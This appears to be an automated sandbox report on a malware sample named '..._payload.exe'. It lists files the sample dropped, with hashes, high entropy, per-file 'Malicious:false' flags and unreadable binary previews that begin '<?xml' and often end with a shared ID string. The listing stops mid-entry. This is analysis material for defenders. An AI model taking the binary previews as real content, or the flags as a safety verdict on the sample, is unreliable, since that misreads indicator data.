                                                                                                Preview:<?xml....~..;{bK#|h.1.X.x....?4r)E..v0).4..........>[..s.&..E.....n.\O.......:s.[..&.,..LM..Bc.;K....].\<..%"..9..2.....'..a9.z........z...".e(ZT9z...J....q..X...j)2.{...7]mt..$3~%.@.u.@.e....).{..8T.......,....a.P4>.....t.?.&.....O/H....`....lN9A"."....nf...'w....<I......9...#s(.q"AW.....#....yVc...;...J....'...i.....0......l.u...6I.7z.....o.a....bp.#.-S.#..M.L8...*o.Ys...AJ'....~.8.6...Kh.l*..q*6.......:(.....v$Ka.d...F.9HDZ...f.O.sV.....(.......G..q..r..k(..FM..=.#w....C....B'..f.p....[.N.[n...e..$;..q.D.....P.=_..MV...%+..2.z.I.."....\'.'Wz1....$..=]....;....M.....&.q.N.!..G..uW9.e.l.=e..>.....Z`..o...vh.."6.l..2.+=*a.1N....,.s.R..X........Y.yg;`.bC......f.A:[(..r...8...3e...6.z..u+../..9..\.YD.4.:......L`...%....D.]...8...e...... L9O!.A.<.7e."........<...w...d....K..z..@.0@.....(.+.i.M...|u.T.9.-....=..S....M.s.S.w...g.I.;............PM..a2.......i......PQ.O..r.U1t...w.s.c7.T.S.t...W..;.....(..x...ok.2.3..:w..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):744
                                                                                                Entropy (8bit):7.719648580238866
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:c/Bk0aEj9COAE29FGTHgbclk3nRfrmWkl8bspT6qwCbfHrZQ90bVZsgJc3cii9a:WDbj93ALGTHgbZXpcrpGqdbfa6bsx3bD
                                                                                                MD5:9C361AE23ED872F11128A248F804DE5F
                                                                                                SHA1:14F97F7D04BF853805080FE00BB10878B4C43110
                                                                                                SHA-256:5C8E271AD10403983024193494ACF4CC36C5B41AE35BA3199D155336F8A7C857
                                                                                                SHA-512:3D676E2ACEC28809F65EB725ECC4D361EFE126DBD9200ADC37CC677DC369BC4DA4D632CFBD7E5BAD801C66CEE038128AD8C8B712FF6EB8EF9B190E9B0CF2B727
                                                                                                Malicious:false
                                                                                                Preview:<?xml.T.w.+.g>...&...I.y.....N...{.t..6...?..#.I...e&.59l....;2....{.;.&.,e%A..Y`.#..&N..S^.jj.....?.n..O[...DDnVZG.%.&MN.......p.....Hz..q....\..\...n.m.<.^R."P...x....O)o...r..R[.fP.'RI5D....z.3[.?p....._.k.e...$......u........R..\..4fh..(s..J..).u&.r_ctsC..].uzr|.h.T.....g...BK|..0R.7(...(...3....R./...../....3K..u..7.[.....5.p.GQ....3..f.P6vq....p..(B..].pj.:..J%...8._..4...Y4t.j.H.....k...)..l.<[.&.q.......?.6.......)............Y.'.v.......i.J..!Q.....$.O..84.]..=..J....d.c..I..."cP.......-..lS....x..$.sh..r..d.`..(....k.!..~.....Jh...#..e.w.[j1v..a...6.......@........<..y.F...S...]2Q...T%R\..:.F.U}n..XE.E.\...a...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1620
                                                                                                Entropy (8bit):7.885323790868708
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:JOLkzeWUQUEgEI5s9r+biur6XKYDRrijarX6t9+LD:J2kyWUQKEIm9iNmDNi0X6t9G
                                                                                                MD5:F82B6A66851B2E396A2AA0927B03DC6A
                                                                                                SHA1:3232EC0C0A034A66781199DA7DEBF979DE62760B
                                                                                                SHA-256:95387DB79D8BCB55F54DED753FA7C9A1FF47598DF519CA95C0CD2F9A6551C402
                                                                                                SHA-512:6F96D0880906B169C3BE1AA83FB9B20A5B0E07DA2D632206C621CB01B4765B39F5A0B7561986311D9441D2A3F1DBF2EBC7913E4C2208DA37B0169BBFC419B3F4
                                                                                                Malicious:false
                                                                                                Preview:<?xml..\.,0.9u..uG...Opuc..=.,......_r1.].@....q.%...........ZF........;0..."K.......8..+L..9.e....w.c!o.u..W.^.....(.*......r.[.<.1..]_q"......t%5....=P*..1.GT.....H...AD../.1&..Kq......"gf..c...!8......[L..hs..>g.Z....}...H.0.._.X.r........ y%.o.....<._...yl.uyv.^...1...4O..=r.+.)W..Ln.....&...azB-[TQHX....[..T......e..J...oAx.!LQ....).w..[[..c..........Q.};/....]..'>i.9..Y.R.!.....AH..g.....8.........v...........Z0..;Cl...Io..CYy.u(.+....g.........r.....f.|.-....n.........#C..f@.y...c....&..=...M.....}Z(5..X..o.Y.....>xB..h...G8....pz+.....<(...7.....F.."G.{x.........G.{.S.6y....Z..3..f.....-..#.@.p....9...9.@.....]n......^OA..<.n........N&.M..~.b....Ta.=p.3....h.........b.u+...u.0Yu.T.wZ.3B.<...|...^P...u.$....#..djn.[.%...Vk.D..)w.Di ...x&t..Q..... .0'V&.z*S\...X!...w6..wU..A.>...i..B..o...^}...e.._.s...[.J.4.@v]i..i...Q.....f...)y\...2A...T.......:.|I!@.@....].....w...e......B4fP...A.....)...&}..6I~.?.......3.P\...b,..p1.j.....7..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):821
                                                                                                Entropy (8bit):7.737964856329516
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ybfc8GFlO+TleXAYjdSq/itNBuCop2QP6m3DkAx3bD:YY8EB4AwaBLM2o69sLD
                                                                                                MD5:E6B5256C8BF5A1293B9DB52C82DC49DE
                                                                                                SHA1:F87C1567C164B9F64C208913AF1F3135F72C0DB3
                                                                                                SHA-256:781A5ABDA1064F48288C1009356A99A4247DD3258C34E3FB6517FFA8942D1BD7
                                                                                                SHA-512:AF585D56A176AAB7DBF652569FFED2FCEA48296811494060F0A05247BF20347BB9EB8855519FF2020E6536C800873787412155F0BB9E999BBD6A721AD9496C28
                                                                                                Malicious:false
                                                                                                Preview:<?xmlA.0b0..Xu\................Z....{....i.........v........v3L.g..*....@...S....n.A..3.\..E<.v..Q..d`x t2.?.]M..10+..|....z.>e.?..&.'..J.......m..(..-..WF0.f.'}.<w..J"...G.0.!fSH..f...J..|.P.:u}.J.L...hl..m.la.|4.I..}.#.M........e..t..}..q....a...,J.Rp.....l.....N.;|..^t.cw..k.*..8......>...j.........*)G..h_....H..&.6..s_...N-B?B.........V.."....E....l.|.L...........6....\..,....V...I.-9.\M.E.Fh|....t....;..m........U...$.x...WI.}.d..Hh..m=..*".=.Y}..3...X..u.j.=k.Q...8..-.{....]..X...J.p..S.zN.Ef/N.K...)r..J...s8./..~..........Z.m.<...bc5...d...-.c...7...j...V.......k`.....h.Z..n.Ygy >v.6.]ptk...=..+N,.@ ...M......9Df....>..3......i..n\...@...oKr........A...B.....$..V.N..]\.dB.$. V.3.s..(b...16.{BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1034
                                                                                                Entropy (8bit):7.770187342417676
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:purEFw56EYqFTElJbr7C127MpunRiuAATHkMiRZXDQ67xKRkW9dpTqSx3bD:purEgcqTEzbH0pahHkMiRZX067sRk0/n
                                                                                                MD5:D723A36ABF57DCD9450504810A06A1BB
                                                                                                SHA1:6C0701D0E9EADED6970FA81BD526F2989B8D7F76
                                                                                                SHA-256:0D1AE84E328C525E2AC07E1AF3542C5444E2A5D0CBE8BF0A114DFFEDB3C77EC9
                                                                                                SHA-512:8F308F3728A3A6C80C61E73DDF86314D9B9913BBC41181B6AE7BDF5C80510921E8601794D00692AE623C27563FEC1105B4E66D12395B94F407FA475FC04AC0EF
                                                                                                Malicious:false
                                                                                                Preview:<?xml..L]z..$..X..l.A.V..w..5.F..iSh.}...8C.......................b.7....~Y..JZ......7D."]....:..=.ok...:`.N...V,$...5...~......A.df.C.....TOr...........&.*.x.B.h%H?e^{..UA2v2.......aJ1.Y.#R[..6....."..)W']\$..].iLD..$..H".k..t.....JWv!....1.....H.Z._.......D..?.^.bc3.........,<.~..d.u.Mr...\...b.!.....#...x~h.D.jNk$|$o..A..~...N"..X.C2..U.E.. ..x.....[3.Z.J..*..a'.H%}...Tu.`y.....M.xq~....9%......A?..=>...Hu...^.^..6.2.Z4vK..VS..C.W..K-.......@2....n?..G|#ngV...m...#....t..Pr&q.1o.p\...'..@6..6......2.I}.5....Gwo.|.......L..........DD.....w.x.vu...*.%.....2%x'...0}.7..CGH.W.$.......mC%..#......H.HV..dc..uW|......'....=kq6.Y$....GF...M.kC..F.r.."@.a&..|IV.O..I...5.`....v...C..k..MO.q.S.[.....<z ..@.#.....<:.OL<.<~..?$.L..=.7...b....[9X...e.Bm.i<.Y...2...y....q..#...y.Y..?....2..G..c......?A............c......<...l.N,..#xy..k.p8.a.G..VP N./..e...sF.I.m.'.T....../'kzF.!....W..lTi..:.%h...m.......v.EBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1333
                                                                                                Entropy (8bit):7.839164174408001
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:VerHAeXRVNoYTXf9sIanXNtPVS+bfzyIB1TJbvtcbMGAx3bD:eH1X1oYondBf/B1TVm4GsLD
                                                                                                MD5:6D1F09BB5B43D229445E7F8743B6D6C0
                                                                                                SHA1:41F0374E7AF491E0514E7E541D664082BFD9A088
                                                                                                SHA-256:B678CA92AA358ACE3F9F7F71F514B3615E8577E354C5DD163322DB58E918B055
                                                                                                SHA-512:F9A5EF71B9460952236B66A2015D5318B7BCCF69FE5778DE529F85A7CA05E39D1C9394E440F7F253D9A019A92B318630336860BD83CAA5F9E7DAA634116CE4DA
                                                                                                Malicious:false
                                                                                                Preview:<?xml..Wz.t.. ........w.d.<\.>R+i9...3#5U..@ .F....Gjes.Irgp.......Z.qi.Z.g^..#.HI....r..T.b.0..TN.8B\.!../.4...........N.X.!.......E...~.....)&.JcS.Wy........o....zg...M3..9v@.B..z..go_.-...G.v.YHo%..$la...N.....Irj[.....?\#C......K@.@.-G..+..3jL.........../,.C.H..k~...{v.Nd.....l`s.!'..x.+B..)......y.9..b.t....|...CN.,^C.T........C*ces.`.F.....VXB....%...f5u..a.X.XF.[..O.Uq.W..n..&9I...)..CB.7......}-..\......]nb z.t..9.o[..AW..K..A\.;C.+....B...5/.]....Y../...U.RQ...s.... .N}..[.Q.!...xM\.......?...?...\v....;....H..8.g.q:9cNS^{....]....:..~/.U..O..b.8.e(.cgl.me.;...N.. ;.Z..m7.|.=..c.....w...z.`M.em.U8tvWmg. .^..Fju4.d.*....!.!_..K...3&`7.l.).tJ/i..p......S....s....m~..P.S....F..w.N1f.o@..&.\a.%p..b1.1.....M....V#...h..5:.......H...xN.saZs..?.YA6....bT..T)..C...)...ecZX._.B....I.....]....:P....7.{i..7v.".uY..Zz..i..?..%9.......X....I%^.F...7...V.d.Y..I(........;.I.AZ..3b........*.....D...>....".....p...r.C.J:V.SG.....|3..Ky.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2514
                                                                                                Entropy (8bit):7.919578347932388
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Oio++XxTOGGkyvMXDq5KNPOsXgFCqqZp75pa2dcvdjK4FMx6vTi8LD:6xhT07vMTq5Kw4qqZU2GvA4FMovTp
                                                                                                MD5:8492FC01C90BD42B14B35659F43B00E7
                                                                                                SHA1:CA58A646249D4BDEF287F7BBE8AD4770E4F8C542
                                                                                                SHA-256:0FF344590F424C9640FF954260596618AA220CDA85ECC1D7768946FEB80EC078
                                                                                                SHA-512:2C05B2D13BFB2A427292C21B5E183789DCDE91C154483515FF3ED72B2424D185FCBE8611EB06BF1A8D91F8A45AFC54CB0CB6AD8528E94D6B8409A8105C23913A
                                                                                                Malicious:false
                                                                                                Preview:<?xml..f..w2...N.=.]... .O!.#.W.C...Z...|.....>#..U!...A.|.C...u....."..%*.u3......d.......}....p...|$=...[.H..t..A.8B..i+..."...%..=$x.P.(.s.n._......7.U....!.PapD..k..}..~.,.P{g.......D...5s.>n....;Ik..<.....K@...Z...k...k..$~.j... .K..o.....=..f........wX.*.aV.....q$t{fg.n.A9...3jL....G.,..A..{ht.CB-......>....M........\..@{.F.a.2..<.~.j.y....2.....m...a...O.F..AB.q..K7j.h......i....N7.k.*..n.v6.H....3..,.o.Mj.$..R..,...../...XI../..]:!j).R[9*..8....%.`.......8.TpT}...qd.Ln.3.P..W.p.4.'/a..4z.)WK..%....!n.U....U..a]}...]...-....S....zO.fa.....~..q.,."....5..7.....8.)U^.........S.....8.D?.T...+.HU.A"..{....mc..GR........k ..%...-....%.Jlf..Yo..`...4.D.a...CW...<...88 .J...3........2.)N.....2.. ..,...|.w..cf.p3...7..-...).Q=....}...&.D.GA=e}.....P.V...V..@.c..K&..G..;..5O..T..u./.i1w...'f.Q...vUm.I...=.........R.w.......".]k...O,...).v@|....V.F.xHi...3.%iw.zU....2...o........I^S.\..O.Xr..j2...#I@....Y.@...l..(..4%..'...H..D..*a.[>....~.w
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1346
                                                                                                Entropy (8bit):7.858692130466077
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SUfbICpSTqruTAgTT3lGjj0g2b+rB7SPtdOtp1PDgJGGXvepox3bD:S1zTqruTjK0g2bsKtdmPtpkLD
                                                                                                MD5:AD3DBA7737FC0FEBCBF6F5F037FDD71E
                                                                                                SHA1:7E27476D372057817D944EB5C9B1AD3D1F278C0A
                                                                                                SHA-256:1988AEF369720B9E8B84DED43FDD31C3BAA782D36CEDFAF2F560772277B12E15
                                                                                                SHA-512:F75014A2950964FE663F2236B4ACEE81DE072299BCD1AEE39954B7188B92C4221FE51F14D1DBFF7AD54AB0B15CFD98F5CA7BCF47381BBCABBA53AFD24195D12E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.#..n:\.......fQ-*,.~._...a..i..R..........OL.W}..p......3.....}P..(..[........G...q......h.......v.1;......aI...@.5..A.F...m>o..P....y(.xo~r...D.......].qH.......#_.>.~*G.....ON".m......V.."G.J.6.Y...z..6..t......a.k............@..O.`...Q.....;...8m.....N_..i..F[._........A..H..~.&.0Z.....7B./....}k..x...Z.'.._.....=..|[...4L1.....l..V..<Jr.w....5,?.H.)r........:]JC..%{.4||^.O3.A.......<C...WQ.....X..........h!..&....a....|PmZ.J...I..zfL.r.E.^...1{.........:....g9Z.....z...:TtC.KN^Y....^.....S.&..$8....y..du...)..P..|..Q.zi8`..KZ.....*...@L..#u.1.^m.....:is...iF6.y..M...Ut...!.1.o0.......]v{.Q.P&O...|.Y..Hp...dJX.`$..0.X.c..R.R.Se....G..MS.\....kG8}i^.e..6...V...#M..&x..4.'.j.Q.1......~H?.........._W|...+[.jSi.Y.....,DG.j.E.1............n..zHT.T&...y..jf...L./9...%.c.._d5J..D...DT8v.A.....A...N...%.T.[:3s...n-.;...Y.......YQ.eF..K.nI.....>....-|...U.1.#%J.,7.)....FqT.6...1.~...P~.Le.yc..n..8O.o.&\....p"JY($..c...=...m....A.?>
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1041
                                                                                                Entropy (8bit):7.789188601185227
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Uaab8Om7uTD5pbRxylNa+UmIHSQYasjPGISvx3bD:Ja67uqbwmisP+JLD
                                                                                                MD5:A8846B17C71ACE7330EE2CBBB26707C9
                                                                                                SHA1:156C1005D78612BF15FF9D249656CFA3DFB13CA4
                                                                                                SHA-256:2020E5435E0D27059B4822C33BDD12B171E9062836C121690DFAFC8DC50CDCE3
                                                                                                SHA-512:0110BCEAD64A8F36D1292BB16F31934237098A1F605A93C4038999ADF9852EE629563DED87EB68463E73AC1656F6BADE7AF839FA1974F1C0F8A3F2E233DEF87E
                                                                                                Malicious:false
                                                                                                Preview:<?xml7...?W..M....Eg...a.`;.V@....t'....#.2..g.}........U..L(C.&|t.>.."\.(2.v%...otBj7.@_..h.D..N..U!...f...FH~4.`7.....^.#..2...DXEc.3$..F...W...c..Z.n..0a....8.7.>#.c(.a....6.....X....wExQ....#.;.....-.L.o.DN.....FR'..l...`..@.(sN.K........@.../..c.@........b...:x[......l..\...[.......HZ^...2Nl..c..........T.bAc..GS%!.Y.>...+z.MK1Z0....q.1]0TPxp..H./....d......C,...q....+.^.F.v..(L..*.....D.+]z..w<..9h.?..A.........e...R..1..(S*..'-JX...kp.k..p'o...R..H 5.q......u.}.:..../.K.,K.8zb.`Gt..8.7d..uzX.NM.*....=.....f.jVY.f..G.\7....Y......~..G.^..6.....-&.....U.\../Ox..0.......l..C+.H]...SC.+.6e...w..k1..F....%,,.......ep:..y.$.=.f.. X.0..\..2...>..c.0[...c...T....4&.=......t$_4..o.A.V.DFE.>..G....|Y.N.,...t;.@.L.k....bm.@Y.E....kc..._..,.x^...!<.......%........u1t}..r....../......ri...p.W....].Z..h?\E.[t.2L..S............A....b..U..Vf......l....=.....yGJd:.U.j5....g.Dh.........%....k.....Wz.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1664
                                                                                                Entropy (8bit):7.854336406071954
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:H4UnYb47bfFZQuJ9W/F/z3VPMHzBFjEK/LD:F13QuJMJ3VP0/jEKf
                                                                                                MD5:AAEB6E1C31FE167C5CE7B0FAA5316111
                                                                                                SHA1:F853C60694A8DAE52DEDD068A4E8232026F4E1A4
                                                                                                SHA-256:7E475531B923149CC50442F4AB3CCFBEF0A567AA9298F8EB06454C88886950DD
                                                                                                SHA-512:CC865315767115359F9DDF9CA9A9D734C9B26A14B59C1775C2230B3DE9D48BDE1B457E1CEB02C073576C18688D718438D6AA9C17E95B99C76857F80FDC44FA00
                                                                                                Malicious:false
                                                                                                Preview:<?xml.c...`..8.(....m tTh.|0..C52B&D.F...`.^...9..L.b#..#.&....h7&.L.....p.IN....;......FK....W.5..f.X..r...7 .'..8..!....eKR..0.C...Co..Ox....c5..=.....#..U..........-.f.y\.K5..A..S...Gb.....v...\G.....{.oJk].D.|..blo..dA..$ .~G..]..<.......P....w3......9|.......x.JW.......#.l/Y.gq.,).(...C.O....X..w..T..r.^j.U...S.fI..Yc"1.....T.kl)$UA..hh.s......W.C+t........."..W6X2...g.~.xc.8rl..EJJ..YzD*.7...@}.m..Qu.....P.6G}..(....'..........^..Hi.8{.e..Q.O.Pq..0....^..D....[y.k..X8......l.l.m.g..!..3.X.[..[..Q.ru.DU_...C.".ZV..O.;VbQ.Z....[...]p.<....x|...b...z..H$...2gA.^?\S+m$.Lu...._..F&zj..1..}w..+..W<8.......G..E..1...'..H.....?....3.#..\WV/.L7.....A...;L{F.<.z.*i.I..,..-..;.Qjv.?.M7..7...m.k.<.....j...QC...b.=.Y ;....m.#.|.-{:.\..PHK.x.IZ.zK.R.I...4[.7........XJ.De....P....T0.m.....,c.`b..J.U......c-...7..?.K..m.^E...9yT..D.....l.....+^..39."].Y.F..0...?-..CA.5hw..`....D|..p..j......Y..`',..!.$.........wm........3H3...G.T8...W.y.g.:.....i/..b..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1195
                                                                                                Entropy (8bit):7.829837303268502
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mRfZpNOoEebiglBtbM7sMCY9+XziJVqFsFTrmo6wyVpw334fx3bD:CfZpNOOigJbCsMj9+OqyhyoCVpBZLD
                                                                                                MD5:EEA2A95A581EA8E29590742C22BAF7C3
                                                                                                SHA1:76C5D82285131D4ED155170E464D85528ABB23B9
                                                                                                SHA-256:9128BFE0DFFC29323916E1123582C1559441D384187BE3129F964D8157A5AE13
                                                                                                SHA-512:1E4ED33822BE0132F68EF6691307FB3723B4E6FF965190C05E9CDC68833B3961FFB697E16F09679B4A05A72529CE0E4C35190D8FDB4E24594A4F94CDC474E06D
                                                                                                Malicious:false
                                                                                                Preview:<?xml.MQ.....2...}Pt..)...=ky.d&. .nV.r.0%T(&c.9.;k.&..Xi....A<.V.3>|L<...o...^......t.....r.$7}N..#-z.0...D....,.\.Pn..*3...:W.~.......B.-a..".MT1_.V..)1.?B...k._-...[...8...o.._...h.l...1.y..0.|.....C$....\.....Do^p.2.'.|....u0..x..*.}.?.n.....2.P.W~..<@!u..nJ.,\._VZ.H^. m*.......6DG..?.l.n..z1..%...I.-,...a..-...?,L;.Y..fMuv.~.{.@0e.;Y.A\....MK..9..b...1...H....~.Q....?.nV...q...^./..o.Jp...1.v..;.K.{..]..~.....?7.*.a......e.......N......y..../.<.HJ.w}...Q...^.W0.r...huVb..o.w...n....Jpn9...O.!<.E......g..s>H...^....Tf..i.@:.=q/n.>.\..b...(.TS".0..qh.>.....Q...K._:.X...g...[|.O.R..%.>Dc.i..T.8......y6;._k.....h..m}{.`wn...K..4...x1..\..@Z'!...Wp{^....%}l./g.O.T.@5.!.#05ex...O.ei....._Y.-....${.AH.f...O...A....{..&X.g.G.....e...i......n..g.c.k..j Y"|V .?/.....}:.......![&.....b.gs....C.Iys....1......Y....%......1..M.(..B..@oo.+Y.U.)e+.p..x$....@......Q....c.C8~.Fe...*At^g...!....c.s.P...R%\....|.I=...q..WG.[.C....2!.......<.w...hV|..5r.0
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1269
                                                                                                Entropy (8bit):7.824155997521177
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oiYJPVD+17MbH2pr8ZwqehdstpggfhtGOi6trwCQyVhEJGAmox3bD:KFVqIjwtPsDlimrX5V+JdLD
                                                                                                MD5:6461F0E1FC7DCC2AACCBAB9CC76C9058
                                                                                                SHA1:4CF8329CD42DCDBAE9DCE716CB7E771E8C7E151D
                                                                                                SHA-256:9C6BB305573E1E750F5DA1BDD7430B203EB82EF955107EEE40DDCB79D27CBCC9
                                                                                                SHA-512:DEA987BCCF20481D5D477729ECC7F04CE6EA3B3D40F8E4265D07D296EFA8A8266930A0041DEA09FA12857604C7D1BE7C3EBA2A8BD1331235160B9C38A21EAE87
                                                                                                Malicious:false
                                                                                                Preview:<?xmlUGrr...Yf..r=w..1."^..(].Y4.....K..zt..xD.~.P.O.c..F...GY..=Y.w.._.&..2..i....K..#...h_}H;Q@..%@..+.f..xZ..*......7@\l%.v{....C6(........f.#.....H......9_..:.H.Y.l....E....I}......./._..q.n....t.!....~..Z.V.`.8....j5.i<.H1.....t..J.4.U............h].3a..j....M........u*..I.....F::.$..R....Y...6Yq_..A.O...O...".-..&..!ZB........p..=v\...K...k#J....B,..5..j........qHg.....MBB.A.m.....U.....r..ixX.. ...Wu w..U.&s'.w....'.....'g.!.I...?.....{..7...q.S..a.,..2...>..u...;f..._.....w|.4J..C......<.b..J`p...'.?.`m.T+p..$...lw>.qS.....W....{..,S.....~....w...A.Ln.....&.w.r..v......-.<.Y.......4t.U3/7..H..u4.{B..v.6=..:B.......B..W...ZwB{.&.....q.rw.."Z..t>.1|.J.7.l..2.S...{.UPO.9..-......KD#O...c..?.4..s..H.....{.{..!L..=..@...~.>=....Mn.I{a....6D.4.I..g..D...1.^......8 t..,..K.....q......-....wD_..p&.H<.;..x.;..XlD.>0.W.M.?(..um\.z<.n1..r(q..R.................y.E'...n........,..#....K(/...e(.<.F...u..S#d..q...3|..I...f.E.....XZ.1.-l..f$.y..W
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1994
                                                                                                Entropy (8bit):7.900797123513812
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2rA+9hrOgQMLjskJWVoK2Wv2VfyGHXi/lZiadd9FuQcLXXrex2/jrPs1Lk6ladVc:ULYZr1v217ylUad0FXXrOYHPq2cLD
                                                                                                MD5:6EE08251393B5EFCE7BC69B061BB3A71
                                                                                                SHA1:0DC5F79433F81BE247B32C10D8135E0918A2C4AB
                                                                                                SHA-256:0486B3329C8EF90AC35E82FF08A4E6E71CA78F3BFBAEF99B288EB7366D81F281
                                                                                                SHA-512:682AA56930284D9441F6067C37E3CEA8E3B8191DDD087BF7F7B1A77B4729DBED89FAE3C4BD8BB591D20D0F6AD2EE247A120B74B6D23DD9B11CD9C9C9E189ED4E
                                                                                                Malicious:false
                                                                                                Preview:<?xmlco.. .?...E.T.?..SK.y...Um4.SY..K.%..'.Q..".lT..U...8].L........Ezs&....y07/.Ahp..9.)!.tF.A.c^....9.x.."...`.X..R.u.......a.........x...x....I.T....5{.l....0I.>.C.(j..o..`..U......z.....3...<..s...'0...X..>x.,B<..y.@........R.].%I.G.....H...... ... ..'..]..;.].....l......./A..].{......c.Q.Un.^. s.X;.\.}bM..]WdO.....t..E\Q...A.%...-I....g3.z.L.]... 8...[.'q1..{N.8.$..Q.Q.6....."...6....d..8E.z4y...J.,.&.F.._...........l.n.^.$N-.y.Bu...s...j.g#RJ.Nr{m.`...Prn4..0.$O#6...D.......Y........k..q..tr*6. .}U.S..X..?.G.....|3......S......J!......{ip..\.<...e...A..I*..G.L....8..[...r....rd5.z..........\.u..............g"..[.....Y....&.K.....v....gwV.S..L92.#F..l:.&.RZ..E|_.<;DBm..Ib..r>.q,..P.0t.oV).d..A\...V.k.|.dhw.=..n.x.._.I.b..3.{...4.BxUu....A..8....6.I<..IW.*...).^p..N|....+.Q.z....".L:.....l....MF..s._.!.OW.#A.X..2E.:34.../...2r.........,.V./.x.t.T..L.<_m*.z.....8(r.{...ve.._|....Q.Uo..F^..].hj...i...fKSb......e..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1506
                                                                                                Entropy (8bit):7.82785011182791
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8G/iw6VKWHBhvGWNZ2wl6crM1a6G7EHaHUJ3qC+qF5f/UKudcYI5iP0LnX2rDAxn:8G/irKkBhUwl6crM1W770ZL+qF5f8Kg8
                                                                                                MD5:C8044041DD7A8381AA485C24377F323E
                                                                                                SHA1:13A6C31F79560B7049FE56982F3FF445BDD7E2E3
                                                                                                SHA-256:6F2A55CD0EB5D444B484C133D24B617D6FAAF7CF66CCB1AE96F26C3BD5949652
                                                                                                SHA-512:5E07CA0D6722AE3A969F79370461D70D411DF3597266B56E01AD571322FAE71B8FE2F5920A4C4556D71476D58E624391DDAAC9BBC73DC41F9AE9433140436D9B
                                                                                                Malicious:false
                                                                                                Preview:<?xml......d.J..=.-d.4+3_.]....e..T..)u.........p.Y.ht.....m....3Y.W.G>..N.6(7..B....md..pDL....FN.....i'jK!R.`U..BZ....|1..|E........q0N.fF..4U..+p.]..........j...V].4...d)...:....sqF..O?.....E5..?...#. p!.n.v..;<.C.g....B)k..o.~+.j...(.o.ToLg...P&..)......m.?........8f.A.`2$.E._o.Y...).@..<.Bl9b..*7..Z..x...][.~..k...9g.%PQ<.E..:.WF....-k.t....F60+.m.".............V............'....!..Zo........r,V'!..?.h).o.8.p@.9.)rR..Kx.....XE~.S.8l...#{......D.h..z...[C.:3...B,..6.a.l.S.l.X....4....S ..[..S...}x..X...c...t.>.D.`.p$$2X.......)5/z.G..`...~F...?[...x..].L..-G./a..{.Y%.`.g._|^........0.K..c.*...1.B.d......n.86..!.W.C...J..'.M8.=<E.......K.T ..D.U5..`..\....U.C.YMTd.=T"c... 6.*.o.EwS\`..3..'..=...y.l...Fo/...qa.?$q........*.....qj'....D....vY.E..gL.z}..X.;&....a}..QJ..(F....W.P.x.{.<!@.&cn.kb.I.dY.#.h'A../A...Y|:B..qb.\..&$.....}.....&[./v3...uml..B....!q.x.&.....@..2<..4.h..i.z#4.....N..-`'d..bJ./.8.|1..o..g.7.<..~.}+...s.*.'=GHOJ?
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1511
                                                                                                Entropy (8bit):7.851467634454579
                                                                                                Encrypted:false
